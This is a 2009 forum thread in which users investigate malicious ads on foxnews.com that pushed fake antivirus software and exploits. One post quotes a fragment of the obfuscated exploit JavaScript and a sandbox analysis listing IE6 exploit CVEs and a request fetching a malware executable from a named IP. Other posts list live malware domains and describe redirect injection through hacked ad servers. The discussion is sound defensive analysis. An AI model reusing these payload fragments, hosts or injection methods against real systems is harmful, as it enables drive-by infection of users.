 EGeezerSummertimePremium
join:2002-08-04
Midwest
kudos:7
3 edits | reply to moonpuppy
Re: foxnews.com infected?
Seriously, my NoScript and AdBlocker take care of the issues. If I need to allow scripting, I do so only for their home domain. It takes care of the malware issue. |
|
 La LunaSurvived AshrafulPremium
join:2001-07-12
Warwick, NY
kudos:3
 ·Vonage
 ·Optimum Online
| said by EGeezer:Seriously, my NoScript and AdBlocker take care of the issues. If I need to allow scripting, I do so only for their home domain. I was just going to ask that question, does AdBlock and/or NoScript prevent this malware? Are you running both, or just one? I tried both a while back and found them extremely annoying, blocking things that shouldn't be blocked like videos, etc. It was torture trying to weed out the bad stuff from the good to get things working.
I also use a simple Firefox add on called QuickJava that allows me to block both java and java scripting on the fly as I see fit on a site per site basis, although I'm not sure it would work with this issue as there are multiple domains involved, not just the home domain.
--
1/20/09 The Beginning of the End
13,067 DEADLY TERROR ATTACKS SINCE 9/11 |
|
EGeezerSummertimePremium
join:2002-08-04
Midwest
kudos:7 Reviews:
·Callcentric
| said by La Luna:... Are you running both, or just one? I tried both a while back and found them extremely annoying, blocking things that shouldn't be blocked like videos, etc. It was torture trying to weed out the bad stuff from the good to get things working. I run both.
I agree, it's a pain until you learn where the media is usually stored. thanks for the quickjava mention - I'll have to try that.
--
The greatest dangers to liberty lurk in insidious encroachment by men of zeal, well-meaning but without understanding. -- Justice Louis D. Brandeis |
|
MGDPremium,MVM
join:2002-07-31
kudos:9
1 edit | reply to Cometcom1
I can confirm what other recent posters have experienced today. I now categorize foxnews.com as infested. Remember that a user need only visit a page at foxnews.com to trigger the malware popup. It is not the result of clicking on any add.
While on this page at 16:57 EST »www.foxnews.com/story/0,2933,517084,00.html the following was generated:
quote:
19.04.2009 16:57:21 Network Shield: blocked access to malicious site 78.47.132.222/a12/index.php?url=http://truconv.com/?a=125&s=4a12 [ C:\Program Files\Internet Explorer\IEXPLORE.EXE ( 3388 ) ]
Allowing the process to proceed generated this:
Then the page hijacking scan:
A download process of vsm_free_setup.exe also began from toppromooffer.com
While there are many who classify these fake AV programs as "Scareware", I disagree. While the the first phase of the process will involve charging a victim's card ~ $70, followed by numerous other charges in the following days and weeks. I have yet to see an infected system that did not have subsequent installs of key loggers, and back door trojans that turned it into a bot and enabled remote access. That observation is supported by the repeated analysis of these payload installs.
The downloaded file vsm_free_setup.exe was already in VrusTotal's database from a recent submit, and a fresh analysis of this file generated: »www.virustotal.com/analisis/26be···95f80e26 However if you review the related ThreatExpert analysis: »www.threatexpert.com/report.aspx···47a88f8f
Take note of the following excerpts:
------------------------------
Analysis of the file resources indicate the following possible countries of origin:
Russian Federation
Ukraine
------------------------------
Possible Security Risk
Attention! The following threat categories were identified:
•A keylogger program that can capture all user keystrokes (including confidential details such username, password, credit card number, etc.)
•A program that downloads files to the local computer that may represent security risk
------------------------------
It is indeed disingenuous to only classify these as "Scareware", that undermines the severity of the crime.
The download location also hosts a benign page for the malware:
Many of the same locations as were listed in the earlier post are showing up once again. AS24940 HETZNER is a repeated cesspool for this genre of virus infections:
Added excerpt for emphasis:
quote:
Has this network hosted sites that have distributed malware?
Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 85 site(s), including, for example, toppromooffer.com/, bestantimalwarelivescanner.com/, bonuspromooffer.com/, that infected 5596 other site(s), including, for example, portalby.net/, noreastcycling.com/, asiaspa.ie/.
Yes, that is: We found 85 site(s), including, for example, toppromooffer.com that infected 5,596 other site(s
Some more observations to follow.
MGD
Edit= Added text |
|
|
|
mysecPremium
join:2005-11-29
kudos:4
1 edit | Thanks for the information!
The Fox News link you gave must be fixed - it didn't redirect anywhere; I used your malware links manually.
I get different results, depending on the browser.
said by MGD:A download process of vsm_free_setup.exe also began from toppromooffer.com
Using Opera, all that happens is the display of a Prompt to Download, which maybe is what you meant:
The victim still has to initiate the download.
BTW - the exploit requires JavaScript to be enabled:
script language="javascript" src="../../etc/config.js"></script>
script language="javascript">
//CONFIG.AGRESSION.EX.VAL = 5;
/script>
SCRIPT src="img/jquery.js"
type=text/javascript></SCRIPT>
SCRIPT src="img/jquery-init.js"
type=text/javascript></SCRIPT>
SCRIPT src="img/flist.js"
type=text/javascript></SCRIPT>
<SCRIPT
Without these files, nothing happens. To test, I disabled JavaScript in Opera and got a blank page.
Using IE6 with 78.47.132.... that you gave, the browser locked up and then an alert to a remote code execution exploit:
The Page Code has this (excerpt):
<html <body> script language="javascript">try { function
MxKrzZOSqYbxzW(IgKhV){var tOdCnZgx="",beVpC,PTfki,
yemjblcpAo,yAFgXcIB,WGmxZNPUc,zItDdLHBVJ,kjqrOKMSP,IdVpm,
sANfyVmBOC;var gWyitpZ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxy
z0123456789+/=";var aRzhby="";for(IdVpm=0;IdVpm<IgKhV.
length;){yAFgXcIB=gWyitpZ.indexOf(IgKhV.charAt(IdVpm++));
WGmxZNPUc=gWyitpZ.indexOf(IgKhV.charAt(IdVpm++));
sANfyVmBOC=MxKrzZOSqYbxzW;zItDdLHBVJ=gWyitpZ.indexOf(IgKhV.
charAt(IdVpm++));kjqrOKMSP=gWyitpZ.indexOf(IgKhV.
charAt(IdVpm++));beVpC=(yAFgXcIB<<2)+(WGmxZNPUc>>4);
PTfki=((WGmxZNPUc&15)<<4)+(zItDdLHBVJ>>2);
With some help from Wepawet:
Analysis report for index2[1].htm
Detector Result: malicious
Exploits
1. DirectAnimation PathControlHeap-based buffer overflow in the DirectAnimation Path Control (DirectAnimation.
PathControl) COM object (daxctle.ocx)
for Internet Explorer 6.0 CVE-2006-4777
2. Office Snapshot ViewerThe Microsoft Office Snapshot Viewer
ActiveX control allows remote attackers to download
arbitrary files to a client machineCVE-2008-2463
3. MDACArbitrary file download via the Microsoft Data Access
Components (MDAC)CVE-2006-0003
4. WebViewFolder integer overflow via the setSlice method
CVE-2006-3730
Deobfuscation results
Methods
GetSpecialFolder 2; BuildPath: w32NOFJCyliz5mm5R.exe
GET http://78.47.132.221/a12/aff_12.exe?
Malware
aff_12.exe?u=i_6_0&spl=11MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit
The 3rd exploit (aka MS06-014) is the one I was served up. The clue is:
GetSpecialFolder 2; BuildPath: w32NOFJCyliz5mm5R.exe
Special Folder 2 is code for the Temp folder and in the alert you can see that this file was not found because aff_12 was blocked from downloading and renaming to w32NOFJCyliz5mm5R.exe
According to the analysis, all exploits downloaded the same payload.
VirusTotal Result: 2/40
»www.virustotal.com/analisis/178d···a2f50448
It is rather common today that a malware site determines the browser and serves up exploits accordingly. All of these are IE6 exploits which would have no effect on other browsers.
This is the 3rd exploit I've seen recently where the exact same thing happens: IE6 gets served a batch of exploits looking for an unpatched vulnerability, Opera gets something else.
This shows a level of sophistication and efficiency on the part of the malware community these days.
I recently downloaded Firefox to test sites. This is what occurred with Javascript enabled in Options:
Even clicking "Ignore" would not load the page. It took me awhile to find the security setting.
Trying again, I'm served up a PDF exploit. From the code analysis:
Network Activity
Requests
URL: http://78.47.132.221/a12/pdf.php?u=i_6_0
But it requires the Acobe Acrobat Javascript plugin which I've removed:
Different browser, different exploit. And that might change at any time!
And so it goes...
Edit: added code excerpt
----
rich |
|
| reply to moonpuppy
Just to confirm. Still being targeted here as well. Fake antivirus type redirection.
As I expected, there's likely a reinfection timer that checks when an IP was last infected to avoid reinfection over at least 24 hours. - My tests seem to indicate that this is not done with cookies. |
|
 SentinelPremium
join:2001-02-07
Florida
kudos:1 | reply to moonpuppy
I still have no problems on FoxNews.com. I am using Firefox with NoScript and FlashBlock and I use a hosts file to block ads as well. |
|
| reply to moonpuppy
Nothing against foxnews - it's their advertising that is acting up and spreading the malware. Likely without them even realizing this is going on.
I've now established contact with foxnews and they are looking into this very seriously.
Cometcom1 |
|
| reply to moonpuppy
I left my Home Laptop on over night on Foxnews.com (Nothing Else open) and my Laptop Antivirus (Symantec) Picked Up Bloodhound.Exploit. Also, a user in my office was slammed with 3 different maleware issues (She claimed came from Foxnews) and after i cleaned them all I installed the latest Symantec EndPoint Protection and went back to Foxnews.com and sure enough it picked up 3 different maleware trojans. It stopped all three and I then removed any IE7 Add-Ons and went back to the site and nothing happened. There is something about that site. |
|
 fatnesssubtleJanitor
join:2000-11-17
fishing
kudos:13
Bright House Netwo..
Earthlink DSL
TekSavvy
Forum Feature Requ..
Need Site Help
| reply to moonpuppy
Maybe this will provide more of a push for Fox News to deal with this problem: »FoxNews.com Serving Up Infected Ads?
--
goodbye dad |
|
| reply to moonpuppy
I unfortunately had to ask my entire company to stop visiting FOXNEWS. We will probably end up blacklisting it today via OpenDNS. FOXNEWS better make this a huge priority as I'm certain we are not the first, nor will be the last company to do so. Vundo, Bloodhound, etc all have been blocked by Symantec AV, however others have crept in and Malewarebyte's AM was used in safemode as well as Symantec AV to scrub the little PITA's out.
Infection seems to occur via FF and IE7. I'm not in the mood to install adblockers or noscript company wide. |
|
 evergreekBoeing Rocks
join:2003-05-25
Hialeah, FL | reply to moonpuppy
I received the same pop up yesterday! Scanned my pc, everything seems ok. |
|
| reply to JsMOM
Re: foxnews.com infected? said by JsMOM :
Infection seems to occur via FF and IE7. I'm not in the mood to install adblockers or noscript company wide.
Once upon a time, pre Adblock (in it's actual block calling and downloading iteration), WebWasher had an application for central deployment that you might want to check out. Just a thought. |
|
| reply to mysec
So how does this infection work and is it really such a big deal? How does it actually infect your system?
Doesn't it just exploit some vulnerabilities in the usual suspects (IE, Adobe Reader, Flash, Java etc) or try to cheat the user to first click yes to the download prompt and then execute their scamware executable? If your software is patched and you have smarts enough to not click yes to everything, is this thing any threat at all? Or ks this a problem just for that mass of people who run with unpatched IE under admin account...
Thanks. |
|
| said by HowDoesItWork :
If your software is patched and you have smarts enough to not click yes to everything, is this thing any threat at all?
Since many users are not aware of the fact that if they try to tell the pop-up "no thanks" by clicking on the usual "close" or "Cancel" buttons they see on their screen, they will probably get the download/install anyway ... I would think that it is a threat to even those with patched machines.
Not everyone knows to use Task Manager or other methods to get out of its grasp. |
|
| reply to HowDoesItWork
said by HowDoesItWork :
So how does this infection work and is it really such a big deal? How does it actually infect your system?
Doesn't it just exploit some vulnerabilities in the usual suspects (IE, Adobe Reader, Flash, Java etc) or try to cheat the user to first click yes to the download prompt and then execute their scamware executable? If your software is patched and you have smarts enough to not click yes to everything, is this thing any threat at all? Or ks this a problem just for that mass of people who run with unpatched IE under admin account...
Thanks.
I thought my system was fully patched.
I will say that I did NOT initiate any download and I NEVER click on pop-ups or any ads. In fact, IF I see something I like, I will manually copy the link and Google it first. |
|
| reply to katarina
quote:
Since many users are not aware of the fact that if they try to tell the pop-up "no thanks" by clicking on the usual "close" or "Cancel" buttons they see on their screen, they will probably get the download/install anyway ... I would think that it is a threat to even those with patched machines.
Not everyone knows to use Task Manager or other methods to get out of its grasp.
Shouldn't the browser still display a download dialog prompt, even if the popup is set to download anyway when you click on anything, including the no thanks button? Seems to me that it should, unless there's a serious flaw in the browser that makes it possible to download stuff without the user accepting the download. I mean, even if you click yes on the crapware popup, shouldn't there still be a download prompt from the browser, unless the browser is just insecure by design? Like this:
- you get served with the infected ad and popup
- you realize what's up and click on the X mark to close the popup
- the popup still tries to push the download on you
- your browser should alert you now that someone wants you to download something, and ask if you want to download the file, download and run it, or to just cancel the whole download
If it does work that way, then it's no threat to those who practice basic safe surfing. But I just don't know how this one works.
To moonpuppy, are you saying that you got infected by doing just browsing the site, not accepting any downloads, with a fully patched browser and fully patched plugins (flash, java, the usual)? If so, how does this thing do that? I'm confused. |
|
| reply to moonpuppy
This is and FYI to all. After I cleaned my users PC and upgraded to the newest version of Symantec End Point Protection. The only thing I did was open IE7, type www.foxnews.com, hit enter and immediately Symantec caught 3 different maleware files coming from the site. I didn't even have a chance to click. I am setting up another PC to test with to see if it was a combination of add-ons and IE7 or just IE7. |
|
| reply to HowDoesItWork
The actual infection is pretty nicely covered with the existing comments here, but how does this malware actually hide?
The advertising is loaded from the advertising servers, i.e. it might be hosted there or it might be external contents that is injected in an iframe.
There are two ways that the fake av is initiated after this initial advertising loading.
Javascript redirect - done by hacking the server containing the ad and adding or modifying existing script files.
.htaccess redirect - done by hacking the server containing the ad and forcing a redirect based on the referrer. i.e. The ad can be displayed on multiple sites, but only if it is embedded in particular sites, will it trigger a redirect. - This is most often seen on search engine redirects. |
|
